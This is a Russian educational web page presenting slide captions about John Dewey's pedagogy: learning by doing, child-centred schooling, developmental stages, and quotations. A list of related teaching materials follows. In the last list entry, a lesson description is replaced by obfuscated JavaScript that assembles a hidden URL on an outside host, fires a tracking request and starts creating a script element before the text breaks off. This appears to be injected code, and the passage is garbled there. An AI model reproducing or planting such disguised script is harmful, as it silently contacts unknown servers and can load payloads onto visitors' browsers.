Джон Дьюи 2023
презентация

Алахвердиева Елена Михайловна

Проектная деятельность

Скачать:

ВложениеРазмер
Файл dzhon_dyui.pptx561.96 КБ

Предварительный просмотр:


Подписи к слайдам:

Слайд 1

Джон Дьюи (1859–1952) — философ, психолог и педагог, реформатор школьного образования. В 1988 году ЮНЕСКО признала его одним из четырёх человек, определивших способ педагогического мышления в ХХ веке (другие три — Мария Монтессори , Антон Макаренко и Георг Кершенштейнер ). https://skillbox.ru/media/education/dzhon-dyui-pedagogicheskie-idei-odnogo-iz-samykh-vliyatelnykh-mysliteley-xx-veka/

Слайд 2

Ключевая идея Дьюи , из которой проистекали все его педагогические принципы, состоит в том, что обучение в школе — это не просто подготовка детей к будущему, а один из важнейших этапов активной жизнедеятельности и познания мира . То есть большое значение имеет то, что происходит с ребёнком именно сейчас. Так, по мнению Дьюи , авторитарную предметоцентричную школу должна заменить педоцентричная (то есть детоцентричная ). «В настоящее время начинающаяся перемена в деле нашего образования заключается в перемещении центра тяжести. Это — перемена, революция, подобная той, которую произвёл Коперник, когда астрономический центр был перемещён с Земли на Солнце. В данном случае ребёнок становится солнцем, вокруг которого вращаются средства образования», — писал Дьюи . Он отрицал логически структурированную программу обучения, в которой учитель или методист определяет, чему нужно научиться ребёнку. Согласно Дьюи , лучший вариант — когда ребёнок свободно взаимодействует с окружающим миром и сам формирует запрос на необходимые знания .

Слайд 3

Педагог исповедовал принцип «обучения деланием» , в котором теоретический материал подаётся ученикам уже после того, как они попробуют свои силы в практической деятельности. Для этого в Лабораторной школе широко применялись исследовательский и проектный методы обучения . Само теоретическое содержание предмета, согласно Дьюи , не должно подаваться как догма. Он считал, что материал обучения — это стимул к дальнейшему познанию , и он должен быть связан с личным опытом ученика, находиться в «его мире», помогать ребёнку решить какой-либо жизненный вопрос. «Задача педагога, — писал Дьюи , — отобрать те факты в пределах существующего опыта, с помощью которых потенциально возможно поставить новые проблемы, побуждающие к дополнительным наблюдениям, расширяющим область последующего опыта».

Слайд 4

В педагогике Джона Дьюи опыт и знания находятся в тесной связи. Он находил необходимой рефлексию учеников, развитие у них критического мышления, умения анализировать, рассуждать и прогнозировать . Важной частью образованного человека он называл самоконтроль и «дисциплину ума» — умение применять интеллектуальные навыки и мыслительные стратегии для решения разнообразных задач. «Подготовить ребёнка к будущему — это значит научить его владеть собой, это означает так натренировать его, чтобы он сумел полностью и быстро использовать все свои способности, чтобы его глаза, руки и уши стали инструментами, готовыми к действию, чтобы его суждения основывались на понимании условий, в которых ему придётся работать, и чтобы его силы, направленные на выполнение задачи, были натренированы таким образом, чтобы он мог их использовать разумно и экономно», — утверждал Дьюи .

Слайд 5

Однако интеллектуальное развитие ребёнка, считал Дьюи , нельзя торопить — как невозможно ускорить его физический рост. В этом заключается ещё одна особенность педагогики Дьюи — принцип естественного роста . В развитии ребёнка он выделял три стадии: От 4 до 8 лет — высокая моторная активность, прямая связь между мышлением и действием. Обучение на этой стадии должно организовываться не в форме уроков, а в виде различных активностей. От 8 до 12 лет — ребёнок ищет ответы на многие вопросы, и его уму нужна интеллектуальная пища. Это время, когда он осваивает чтение, письмо и математику, узнаёт больше о профессиях и науках, начинает обращаться к книгам. 13 лет — к этому возрасту, по мнению Дьюи , у ребёнка уже оформляются интересы в конкретных областях, он готов к специализации и может реализовать свои способности как в науке, так и в искусстве.

Слайд 6

Эти стадии в освоении наук, искусств и профессий, согласно Дьюи , ребёнок естественным образом проходит так же, как их проходило человечество в своём культурном и технологическом развитии . Поэтому, например, в Лабораторной школе Дьюи дети сначала под руководством учителей «изобретали» простейшие инструменты для прядения шерсти, учились работать с тканью и мастерить из неё одежду. На следующем этапе изучали, как устроены механические приспособления, превращающие сырьё в материалы и готовые изделия. И наконец, рассматривали фабричное производство — исследовали механику и физику машин, занимались математическими расчётами и изучали экономику предприятий.

Слайд 7

Вообще, все виды деятельности, которые осваивали ученики, — плотничество и рукоделие, музыка и живопись, изучение различных наук, — тесно привязывались к реальной жизни. Дьюи считал, что школа — это маленькое сообщество, которое в идеале должно взаимодействовать с другими сообществами и социумом в целом . То есть ребёнок не должен быть изолирован школьными стенами от мира вокруг, школа — только часть большого мира. Поэтому ученики часто отправлялись на экскурсии в музеи, ездили в сельскую местность, чтобы изучить природные объекты или явления, посещали производственные предприятия.

Слайд 8

Разнообразный опыт, по мнению Дьюи , необходим для того, чтобы объединить индивидуальное развитие с воспитанием социального субъекта — гражданина . Педагог считал, что учитель должен помогать ученику увидеть мир во всём его многообразии, развивать способности к сотрудничеству с другими людьми. При этом важно обращать внимание на интересы и стремления ребёнка, культивировать их и направлять их в общественно полезное русло.

Слайд 9

Цитаты Джона Дьюи «Образование — это процесс жизни, а не подготовка к будущей жизни». «Когда старшие пытаются привести ребёнка к состоянию покоя, неподвижности, они вредят его здоровью, портят его жизнь, обездвиживают его способность приобретать знания». «Самый трудный урок, который приходится усваивать ребёнку, — это деловой: ребёнок должен научиться приспособляться к людям и к работе, и, если тут его постигнет неудача, никакое количество книг не может поправить дело. Практический способ кажется самым простым и самым подходящим для решения этой задачи». «Человек думает только тогда, когда, самостоятельно преодолевая трудности проблемной ситуации, ищет свой собственный выход из неё. Если родитель или преподаватель обеспечил условия, которые стимулируют мышление, и занял доброжелательную позицию, вовлекая ребёнка в совместный опыт, можно сказать, что он сделал всё возможное, чтобы стимулировать собственное учение». «Рост — не то, что делает с детьми кто-то другой, они растут сами». «Личность и характер важнее школьных предметов. Целью должно быть не знание или осведомление, а выявление личности. Ужасно обладать всеми знаниями мира, но потерять самого себя». «Вопрос не в том, как преподавать географию ребёнку, прежде всего надо задаться вопросом, что для ребёнка значит география».


По теме: методические разработки, презентации и конспекты

Роль физического воспитания в педагогике Джона Локка.

Роль физического воспитания в педагогике Джона Локка. Большое внимание в педагогике Локка уделялось физическому воспитанию детей. Физическое развитие будущего джентльмена стояло у Локка едв...

Интересные мысли из книги Джон Кехо и Ненси Фишер "Сила разума для детей"

В материале приведены цитаты из книги, которые могут помочь родителям в воспитании детей...

Педагогам- дошкольникам о технологии проблемного обучения по Джону Дьюи.

Целью современного поликультурного образования является формирование личности, которая творчески осваивает социальный опыт, обладает свободой инициативы и ответственностью за совершаемые поступки, стр...

Проект для детей подготовительной группы (по методу проектов Д.Дьюи) по теме "Тольятти - город будущего".

Метод проектов Джона Дьюи и его ученика Килпатрика самый трудный, но интересный в работе. Данная технология направлена на развитие у детей познавательного интереса и способностей детей в процессе разр...

Последователи Я. А. Коменского в зарубежной педагогике 17-18 вв.: Джон Локк

Последователи Я. А. Коменского в зарубежной педагогике 17-18 вв.: Джон Локк...

НОД "Настроение Джони" по дополнительной образовательной программе "Английский язык и дошкольник" в ДОУ

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'nxqkbdvu.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...